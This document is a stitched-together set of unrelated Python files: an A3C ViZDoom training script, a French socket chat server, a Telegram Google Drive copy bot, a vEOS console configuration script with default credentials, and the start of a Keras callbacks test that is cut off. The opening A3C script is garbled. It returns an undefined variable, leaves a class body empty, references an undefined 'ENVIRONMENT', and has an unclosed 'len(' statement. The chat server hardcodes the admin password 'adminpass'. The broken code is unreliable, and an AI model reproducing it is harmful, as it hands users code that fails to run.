op_holder.append(to_var.assign(from_var))
return op_holder
# Processes Doom screen image to produce cropped and resized image.
def process_frame(frame):
s = frame[10:-10,30:-30]
s = scipy.misc.imresize(s,[84,84])
s = np.reshape(s,[np.prod(s.shape)]) / 255.0
return resize(rgb2grey(observation), (110, 84))[13:110 - 13, :]
#return s
# Discounting function used to calculate discounted returns.
def discount(x, gamma):
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
#Used to initialize weights for policy and value output layers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
class AC_Network():
def __init__(self,s_size,a_size,scope,trainer):
with tf.variable_scope(scope):
#Input and visual encoding layers
self.inputs = tf.placeholder(shape=[None,s_size],dtype=tf.float32)
self.imageIn = tf.reshape(self.inputs,shape=[-1,84,84,1])
self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.imageIn,num_outputs=16,
kernel_size=[8,8],stride=[4,4],padding='VALID')
self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.conv1,num_outputs=32,
kernel_size=[4,4],stride=[2,2],padding='VALID')
hidden = slim.fully_connected(slim.flatten(self.conv2),256,activation_fn=tf.nn.elu)
#Recurrent network for temporal dependencies
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256,state_is_tuple=True)
c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
self.state_in = (c_in, h_in)
rnn_in = tf.expand_dims(hidden, [0])
step_size = tf.shape(self.imageIn)[:1]
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
rnn_out = tf.reshape(lstm_outputs, [-1, 256])
#Output layers for policy and value estimations
self.policy = slim.fully_connected(rnn_out,a_size,
activation_fn=tf.nn.softmax,
weights_initializer=normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = slim.fully_connected(rnn_out,1,
activation_fn=None,
weights_initializer=normalized_columns_initializer(1.0),
biases_initializer=None)
#Only the worker network need ops for loss functions and gradient updating.
if scope != 'global':
self.actions = tf.placeholder(shape=[None],dtype=tf.int32)
self.actions_onehot = tf.one_hot(self.actions,a_size,dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None],dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None],dtype=tf.float32)
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
#Loss functions
self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value,[-1])))
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs)*self.advantages)
self.loss = 0.5 * self.value_loss + self.policy_loss - self.entropy * 0.01
#Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss,local_vars)
self.var_norms = tf.global_norm(local_vars)
grads,self.grad_norms = tf.clip_by_global_norm(self.gradients,40.0)
#Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
self.apply_grads = trainer.apply_gradients(zip(grads,global_vars))
class Atari(object):
def __init__(self, game, action_repeat):
class Worker():
def __init__(self,game,name,s_size,a_size,trainer,model_path,global_episodes):
self.name = "worker_" + str(name)
self.number = name
self.model_path = model_path
self.trainer = trainer
self.global_episodes = global_episodes
self.increment = self.global_episodes.assign_add(1)
self.episode_rewards = []
self.episode_lengths = []
self.episode_mean_values = []
self.summary_writer = tf.summary.FileWriter("train_"+str(self.number))
#Create the local copy of the network and the tensorflow op to copy global paramters to local network
self.local_AC = AC_Network(s_size,a_size,self.name,trainer)
self.update_local_ops = update_target_graph('global',self.name)
#The Below code is related to setting up the Doom environment
game.set_doom_scenario_path("basic.wad") #This corresponds to the simple task we will pose our agent
game.set_doom_map("map01")
game.set_screen_resolution(ScreenResolution.RES_160X120)
game.set_screen_format(ScreenFormat.GRAY8)
game.set_render_hud(False)
game.set_render_crosshair(False)
game.set_render_weapon(True)
game.set_render_decals(False)
game.set_render_particles(False)
game.add_available_button(Button.MOVE_LEFT)
game.add_available_button(Button.MOVE_RIGHT)
game.add_available_button(Button.ATTACK)
game.add_available_game_variable(GameVariable.AMMO2)
game.add_available_game_variable(GameVariable.POSITION_X)
game.add_available_game_variable(GameVariable.POSITION_Y)
game.set_episode_timeout(300)
game.set_episode_start_time(10)
game.set_window_visible(False)
game.set_sound_enabled(False)
game.set_living_reward(-1)
game.set_mode(Mode.PLAYER)
game.init()
self.actions = [[True,False,False],[False,True,False],[False,False,True]]
#End Doom set-up
self.env = game
env = ENVIRONMENT
def train(self,rollout,sess,gamma,bootstrap_value):
rollout = np.array(rollout)
observations = rollout[:,0]
actions = rollout[:,1]
rewards = rollout[:,2]
next_observations = rollout[:,3]
values = rollout[:,5]
# Here we take the rewards and values from the rollout, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = discount(self.rewards_plus,gamma)[:-1]
self.value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1]
advantages = discount(advantages,gamma)
# Update the global network using gradients from loss
# Generate network statistics to periodically save
rnn_state = self.local_AC.state_init
feed_dict = {self.local_AC.target_v:discounted_rewards,
self.local_AC.inputs:np.vstack(observations),
self.local_AC.actions:actions,
self.local_AC.advantages:advantages,
self.local_AC.state_in[0]:rnn_state[0],
self.local_AC.state_in[1]:rnn_state[1]}
v_l,p_l,e_l,g_n,v_n,_ = sess.run([self.local_AC.value_loss,
self.local_AC.policy_loss,
self.local_AC.entropy,
self.local_AC.grad_norms,
self.local_AC.var_norms,
self.local_AC.apply_grads],
feed_dict=feed_dict)
return v_l / len(rollout),p_l / len(rollout),e_l / len(rollout), g_n,v_n
def work(self,max_episode_length,gamma,sess,coord,saver):
episode_count = sess.run(self.global_episodes)
total_steps = 0
print ("Starting worker " + str(self.number))
with sess.as_default(), sess.graph.as_default():
while not coord.should_stop():
sess.run(self.update_local_ops)
episode_buffer = []
episode_values = []
episode_frames = []
episode_reward = 0
episode_step_count = 0
d = False
self.env.new_episode()
s = self.env.get_state().screen_buffer
episode_frames.append(s)
s = process_frame(s)
rnn_state = self.local_AC.state_init
while self.env.is_episode_finished() == False:
#Take an action using probabilities from policy network output.
a_dist,v,rnn_state = sess.run([self.local_AC.policy,self.local_AC.value,self.local_AC.state_out],
feed_dict={self.local_AC.inputs:[s],
self.local_AC.state_in[0]:rnn_state[0],
self.local_AC.state_in[1]:rnn_state[1]})
a = np.random.choice(a_dist[0],p=a_dist[0])
a = np.argmax(a_dist == a)
r = self.env.make_action(self.actions[a]) / 100.0
d = self.env.is_episode_finished()
if d == False:
s1 = self.env.get_state().screen_buffer
episode_frames.append(s1)
s1 = process_frame(s1)
else:
s1 = s
episode_buffer.append([s,a,r,s1,d,v[0,0]])
episode_values.append(v[0,0])
episode_reward += r
s = s1
total_steps += 1
episode_step_count += 1
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if len(episode_buffer) == 30 and d != True and episode_step_count != max_episode_length - 1:
# Since we don't know what the true final return is, we "bootstrap" from our current
# value estimation.
v1 = sess.run(self.local_AC.value,
feed_dict={self.local_AC.inputs:[s],
self.local_AC.state_in[0]:rnn_state[0],
self.local_AC.state_in[1]:rnn_state[1]})[0,0]
v_l,p_l,e_l,g_n,v_n = self.train(episode_buffer,sess,gamma,v1)
episode_buffer = []
sess.run(self.update_local_ops)
if d == True:
break
self.episode_rewards.append(episode_reward)
self.episode_lengths.append(episode_step_count)
self.episode_mean_values.append(np.mean(episode_values))
# Update the network using the experience buffer at the end of the episode.
if len(episode_buffer) != 0:
v_l,p_l,e_l,g_n,v_n = self.train(episode_buffer,sess,gamma,0.0)
# Periodically save gifs of episodes, model parameters, and summary statistics.
if episode_count % 5 == 0 and episode_count != 0:
if self.name == 'worker_0' and episode_count % 25 == 0:
time_per_step = 0.05
images = np.array(episode_frames)
make_gif(images,'./frames/image'+str(episode_count)+'.gif',
duration=len(images)*time_per_step,true_image=True,salience=False)
if episode_count % 250 == 0 and self.name == 'worker_0':
saver.save(sess,self.model_path+'/model-'+str(episode_count)+'.cptk')
print ("Saved Model")
mean_reward = np.mean(self.episode_rewards[-5:])
mean_length = np.mean(self.episode_lengths[-5:])
mean_value = np.mean(self.episode_mean_values[-5:])
summary = tf.Summary()
summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))
summary.value.add(tag='Perf/Length', simple_value=float(mean_length))
summary.value.add(tag='Perf/Value', simple_value=float(mean_value))
summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))
summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))
summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))
summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))
summary.value.add(tag='Losses/Var Norm', simple_value=float(v_n))
self.summary_writer.add_summary(summary, episode_count)
self.summary_writer.flush()
if self.name == 'worker_0':
sess.run(self.increment)
episode_count += 1
max_episode_length = 300
gamma = .99 # discount rate for advantage estimation and reward discounting
s_size = 7056 # Observations are greyscale frames of 84 * 84 * 1
a_size = len( # Agent can move Left, Right, or Fire
load_model = False
model_path = './model'
tf.reset_default_graph()
if not os.path.exists(model_path):
os.makedirs(model_path)
#Create a directory to save episode playback gifs to
if not os.path.exists('./frames'):
os.makedirs('./frames')
with tf.device("/cpu:0"):
global_episodes = tf.Variable(0,dtype=tf.int32,name='global_episodes',trainable=False)
trainer = tf.train.AdamOptimizer(learning_rate=1e-4)
master_network = AC_Network(s_size,a_size,'global',None) # Generate global network
num_workers = multiprocessing.cpu_count() # Set workers ot number of available CPU threads
workers = []
# Create worker classes
for i in range(num_workers):
workers.append(Worker(DoomGame(),i,s_size,a_size,trainer,model_path,global_episodes))
saver = tf.train.Saver(max_to_keep=5)
with tf.Session() as sess:
coord = tf.train.Coordinator()
if load_model == True:
print ('Loading Model...')
ckpt = tf.train.get_checkpoint_state(model_path)
saver.restore(sess,ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
# This is where the asynchronous magic happens.
# Start the "work" process for each worker in a separate threat.
worker_threads = []
for worker in workers:
worker_work = lambda: worker.work(max_episode_length,gamma,sess,coord,saver)
t = threading.Thread(target=(worker_work))
t.start()
sleep(0.5)
worker_threads.append(t)
coord.join(worker_threads)
|
Serveur.py
|
import socket
import threading
import errno
# Connection Data
host = '192.168.1.62.'
port = 55500
# Starting Server
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
# Lists For Clients and Their Nicknames
clients = []
nicknames = []
def close():
server.close()
# Sending Messages To All Connected Clients
def broadcast(message):
for client in clients:
client.send(message)
# Récupère les messages pour ensuite les broadcast
def handle(client):
while True:
try:
nickname = nicknames[clients.index(client)]
# Broadcasting Messages
msg = message = client.recv(1024)
broadcast(message)
except:
if client in clients:
# Removing And Closing Clients
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
broadcast('{} a quitté la salle !\n'.format(nickname).encode())
nicknames.remove(nickname)
break
# Receiving / Listening Function
def receive():
global server
while True:
try:
# Accept Connection
client, address = server.accept()
print("Connecté avec : {}".format(str(address)))
# Request And Store Nickname
client.send('NICK'.encode())
nickname = client.recv(1024).decode()
if nickname == 'admin':
client.send('PASS'.encode())
password = client.recv(1024).decode()
if password != 'adminpass':
client.send('REFUSE'.encode())
client.close()
continue
nicknames.append(nickname)
clients.append(client)
# Print And Broadcast Nickname
print("Pseudo : {}".format(nickname))
broadcast("{} a rejoint !\n".format(nickname).encode())
# Start Handling Thread For Client
thread = threading.Thread(target=handle, args=(client,))
thread.start()
except OSError as ex:
if ex.errno in (errno.EBADF, errno.EINVAL):
break
raise
except KeyboardInterrupt:
close()
print('Le serveur a fermé')
def write():
while True:
message = input('')
if message == 'print clients':
print(clients)
receive()
|
get_functions.py
|
import logging, re, json, requests
from utils import (
load,
messages as _msg,
restricted as _r,
get_set as _set,
task_box as _box,
task_payload as _payload,
)
from workflow import copy_workflow as _copy
from utils.load import _lang, _text
from telegram.ext import ConversationHandler
from drive.gdrive import GoogleDrive as _gd
from telegram import ParseMode
from threading import Thread
from utils.load import ns
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s", level=logging.INFO
)
logger = logging.getLogger(__name__)
SET_FAV_MULTI, CHOOSE_MODE, GET_LINK, IS_COVER_QUICK, GET_DST = range(5)
regex1 = r"[-\w]{11,}"
regex2 = r"[-\w]"
judge_folder_len = [28, 33]
pick_quick = []
mode = ""
@_r.restricted
def cancel(update, context):
user = update.effective_user.first_name
logger.info("User %s canceled the conversation.", user)
update.effective_message.reply_text(
f"Bye! {update.effective_user.first_name} ," + _text[_lang]["cancel_msg"]
)
return ConversationHandler.END
def cook_to_id(get_share_link):
share_id_list = []
unsupported_type = []
share_id = ""
share_link = get_share_link.strip().replace(" ", "").splitlines()
for item in share_link:
if "drive.google.com" in item:
share_id = re.findall(regex1, item)
if len(share_id) <= 33:
share_id = "".join(share_id)
share_id_list.append(share_id)
else:
unsupported_type.append({"type": "link", "value": item})
else:
if len(item) >= 11 and len(item) <= 33 and re.match(regex2, item):
share_id_list.append(item)
else:
unsupported_type.append({"type": "id", "value": item})
return share_id_list
def get_name_from_id(update, taget_id, list_name):
cook_list = list(list_name)
if len(taget_id) >= 11 and len(taget_id) < 28:
cook_list.append(
{"G_type": "G_drive", "G_id": taget_id, "G_name": load.all_drive[taget_id],}
)
elif len(taget_id) in judge_folder_len:
cook_list.append(
{
"G_type": "G_Folder",
"G_id": taget_id,
"G_name": _gd().file_get_name(file_id=taget_id),
}
)
else:
update.effective_message.reply_text(_msg.get_fav_len_invaild(_lang, taget_id))
return ConversationHandler.END
return cook_list
def insert_to_db_quick(pick_quick, update):
is_quick = {"_id": "fav_quick"}
is_quick_cur = load.fav_col.find(is_quick)
if list(is_quick_cur) == []:
for item in pick_quick:
item["_id"] = "fav_quick"
load.fav_col.insert_one(item)
update.effective_message.reply_text(
_text[_lang]["insert_quick_success"], parse_mode=ParseMode.MARKDOWN_V2
)
return ConversationHandler.END
else:
status = "is_cover"
return status
def modify_quick_in_db(update, context):
pick_quick = _set.pick_quick
for item in pick_quick:
load.fav_col.update({"_id": "fav_quick"}, item, upsert=True)
update.effective_message.reply_text(
_text[_lang]["modify_quick_success"], parse_mode=ParseMode.MARKDOWN_V2
)
return ConversationHandler.END
def delete_in_db_quick():
load.fav_col.delete_one({"_id": "fav_quick"})
return
def delete_in_db(delete_request):
load.fav_col.delete_one(delete_request)
return
def get_share_link(update, context):
get_share_link = update.effective_message.text
tmp_task_list = []
src_name_list = []
src_id_list = cook_to_id(get_share_link)
is_quick = {"_id": "fav_quick"}
is_quick_cur = load.fav_col.find(is_quick)
is_dstinfo = _copy.current_dst_info
if is_dstinfo != "":
dstinfo = is_dstinfo.split("id+name")
dst_id = dstinfo[0]
dst_name = dstinfo[1]
else:
for doc in is_quick_cur:
dst_id = doc["G_id"]
dst_name = doc["G_name"]
for item in src_id_list:
src_name_list = get_name_from_id(update, item, list_name=src_name_list)
for item in src_name_list:
src_id = item["G_id"]
src_name = item["G_name"]
tmp_task_list.append(
{
"mode_type": mode,
"src_id": src_id,
"src_name": src_name,
"dst_id": dst_id,
"dst_name": dst_name,
"chat_id": update.message.chat_id,
"raw_message_id": update.message.message_id,
}
)
Thread(target=_box.cook_task_to_db, args=(update, context, tmp_task_list)).start()
_copy.current_dst_info = ""
return ConversationHandler.END
def _version(update, context):
update.message.reply_text(
"Welcome to use iCopy Telegram BOT\n\n"
f"Current Version : {load._version}\n\n"
f"Latest Version : {_get_ver()}"
)
def _get_ver():
_url = "https://api.github.com/repos/fxxkrlab/iCopy/releases"
_r_ver = requests.get(_url).json()
_latest_ver = _r_ver[0]["tag_name"]
return _latest_ver
def taskill(update, context):
ns.x = 1
def check_restart(bot):
check_restart = load.db_counters.find_one({"_id": "is_restart"})
chat_id = check_restart["chat_id"]
message_id = check_restart["message_id"]
load.db_counters.update_one({"_id": "is_restart"}, {"$set": {"status": 0,}}, True)
bot.edit_message_text(
chat_id=chat_id, message_id=message_id, text=_text[_lang]["restart_success"]
)
def error(update, context):
"""Log Errors caused by Updates."""
logger.warning('Update "%s" caused error "%s"', update, context.error)
|
config_veos.py
|
#!/usr/bin/env python3
# scripts/config_veos.py
#
# Import/Export script for vEOS.
#
# @author Andrea Dainese <andrea.dainese@gmail.com>
# @copyright 2014-2016 Andrea Dainese
# @license BSD-3-Clause https://github.com/dainok/unetlab/blob/master/LICENSE
# @link http://www.unetlab.com/
# @version 20160719
import getopt, multiprocessing, os, pexpect, re, sys, time
username = 'admin'
password = 'password'
secret = 'password'
conntimeout = 3 # Maximum time for console connection
expctimeout = 3 # Maximum time for each short expect
longtimeout = 30 # Maximum time for each long expect
timeout = 60 # Maximum run time (conntimeout is included)
def node_login(handler):
# Send an empty line, and wait for the login prompt
i = -1
while i == -1:
try:
handler.sendline('\r\n')
i = handler.expect([
'login:',
'\(config',
'>',
'#'], timeout = 5)
except:
i = -1
if i == 0:
# Need to send username and password
handler.sendline(username)
try:
j = handler.expect(['#', 'Password:', '>'], timeout = expctimeout)
except:
print('ERROR: error waiting for ["#", "Password:"] prompt.')
node_quit(handler)
return False
if j == 0:
# Nothing to do
return True
elif j == 1:
# Need do provide password
handler.sendline(password)
try:
k = handler.expect(['>', '#'], timeout = expctimeout)
except:
print('ERROR: error waiting for [">", "#"] prompt.')
node_quit(handler)
return False
if k == 0:
handler.sendline('enable')
try:
l = handler.expect(['Password', '#'], timeout = expctimeout)
except:
print('ERROR: error waiting for ["Password", "#"] prompt.')
node_quit(handler)
return False
if l == 0:
# Secret password required
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif l == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif k == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif j == 2:
handler.sendline('enable')
try:
l = handler.expect(['Password', '#'], timeout = expctimeout)
except:
print('ERROR: error waiting for ["Password", "#"] prompt.')
node_quit(handler)
return False
if l == 0:
# Secret password required
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif l == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
else:
# Unexpected output
node_quit(handler)
return False
elif i == 1:
# Config mode detected, need to exit
handler.sendline('end')
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif i == 2:
# Need higher privilege
handler.sendline('enable')
try:
j = handler.expect(['Password:', '#'])
except:
print('ERROR: error waiting for ["Password:", "#"] prompt.')
node_quit(handler)
return False
if j == 0:
# Need do provide secret
handler.sendline(secret)
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
return True
elif j == 1:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
elif i == 3:
# Nothing to do
return True
else:
# Unexpected output
node_quit(handler)
return False
def node_quit(handler):
if handler.isalive() == True:
handler.sendline('quit\n')
handler.close()
def config_get(handler):
# Clearing all "expect" buffer
while True:
try:
handler.expect('#', timeout = 0.1)
except:
break
# Disable paging
handler.sendline('terminal length 0')
try:
handler.expect('#', timeout = expctimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
# Getting the config
handler.sendline('more system:running-config')
try:
handler.expect('#', timeout = longtimeout)
except:
print('ERROR: error waiting for "#" prompt.')
node_quit(handler)
return False
config = handler.before.decode()
# Manipulating the config
config = re.sub('\r', '', config, flags=re.DOTALL) # Unix style
config = re.sub('.*more system:running-config\n', '', config, flags=re.DOTALL) # Header
config = re.sub('!\nend.*', '!\nend\n', config, flags=re.DOTALL) # Footer
return config
def config_put(handler):
while True:
try:
i = handler.expect('login:', timeout)
except:
return False
return True
def usage():
print('Usage: %s <standard options>' %(sys.argv[0]));
print('Standard Options:');
print('-a <s> *Action can be:')
print(' - get: get the startup-configuration and push it to a file')
print(' - put: put the file as startup-configuration')
print('-f <s> *File');
print('-p <n> *Console port');
print('-t <n> Timeout (default = %i)' %(timeout));
print('* Mandatory option')
def now():
# Return current UNIX time in milliseconds
return int(round(time.time() * 1000))
def main(action, fiename, port):
try:
# Connect to the device
tmp = conntimeout
while (tmp > 0):
handler = pexpect.spawn('telnet 127.0.0.1 %i' %(port))
time.sleep(0.1)
tmp = tmp - 0.1
if handler.isalive() == True:
break
if (handler.isalive() != True):
print('ERROR: cannot connect to port "%i".' %(port))
node_quit(handler)
sys.exit(1)
if action == 'get':
# Login to the device and get a privileged prompt
rc = node_login(handler)
if rc != True:
print('ERROR: failed to login.')
node_quit(handler)
sys.exit(1)
config = config_get(handler)
if config in [False, None]:
print('ERROR: failed to retrieve config.')
node_quit(handler)
sys.exit(1)
try:
fd = open(filename, 'a')
fd.write(config)
fd.close()
except:
print('ERROR: cannot write config to file.')
node_quit(handler)
sys.exit(1)
node_quit(handler)
elif action == 'put':
rc = config_put(handler)
if rc != True:
print('ERROR: failed to push config.')
node_quit(handler)
sys.exit(1)
# Remove lock file
lock = '%s/.lock' %(os.path.dirname(filename))
if os.path.exists(lock):
os.remove(lock)
# Mark as configured
configured = '%s/.configured' %(os.path.dirname(filename))
if not os.path.exists(configured):
open(configured, 'a').close()
sys.exit(0)
except Exception as e:
print('ERROR: got an exception')
print(type(e)) # the exception instance
print(e.args) # arguments stored in .args
print(e) # __str__ allows args to be printed directly,
node_quit(handler)
return False
if __name__ == "__main__":
action = None
filename = None
port = None
# Getting parameters from command line
try:
opts, args = getopt.getopt(sys.argv[1:], 'a:p:t:f:', ['action=', 'port=', 'timeout=', 'file='])
except getopt.GetoptError as e:
usage()
sys.exit(3)
for o, a in opts:
if o in ('-a', '--action'):
action = a
elif o in ('-f', '--file'):
filename = a
elif o in ('-p', '--port'):
try:
port = int(a)
except:
port = -1
elif o in ('-t', '--timeout'):
try:
timeout = int(a)
except:
timeout = -1
else:
print('ERROR: invalid parameter.')
# Checking mandatory parameters
if action == None or port == None or filename == None:
usage()
print('ERROR: missing mandatory parameters.')
sys.exit(1)
if action not in ['get', 'put']:
usage()
print('ERROR: invalid action.')
sys.exit(1)
if timeout < 0:
usage()
print('ERROR: timeout must be 0 or higher.')
sys.exit(1)
if port < 0:
usage()
print('ERROR: port must be 32768 or higher.')
sys.exit(1)
if action == 'get' and os.path.exists(filename):
usage()
print('ERROR: destination file already exists.')
sys.exit(1)
if action == 'put' and not os.path.exists(filename):
usage()
print('ERROR: source file does not already exist.')
sys.exit(1)
if action == 'put':
try:
fd = open(filename, 'r')
config = fd.read()
fd.close()
except:
usage()
print('ERROR: cannot read from file.')
sys.exit(1)
# Backgrounding the script
end_before = now() + timeout * 1000
p = multiprocessing.Process(target=main, name="Main", args=(action, filename, port))
p.start()
while (p.is_alive() and now() < end_before):
# Waiting for the child process to end
time.sleep(1)
if p.is_alive():
# Timeout occurred
print('ERROR: timeout occurred.')
p.terminate()
sys.exit(127)
if p.exitcode != 0:
sys.exit(127)
sys.exit(0)
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from unittest import mock
from absl.testing import parameterized
import keras
from keras.callbacks import BackupAndRestore
from keras.callbacks import BackupAndRestoreExperimental
from keras.engine import sequential
from keras.layers import Activation
from keras.layers import Dense
from keras.optimizers import learning_rate_schedule
from keras.optimizers.optimizer_v2 import gradient_descent
from keras.testing_infra import test_combinations
from keras.testing_infra import test_utils
from keras.utils import io_utils
from keras.utils import np_utils
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow.python.platform import tf_logging as logging
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
CALLBACK_HOOKS = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
for method_name in CALLBACK_HOOKS:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
class CallAllHooks(keras.callbacks.Callback):
"""A callback that calls self._run for all hooks"""
def __init__(self):
for method_name in CALLBACK_HOOKS:
setattr(self, method_name, self._run)
def _run(self, *args, logs=None):
raise NotImplementedError
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@test_combinations.run_with_all_model_types
@test_combinations.run_all_keras_modes
class CallbackCountsTest(test_combinations.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = test_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
tf.compat.v1.train.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=test_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not tf.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(test_combinations.TestCase):
def _get_model(self, input_shape=None, additional_metrics=None):
additional_metrics = additional_metrics or []
layers = [
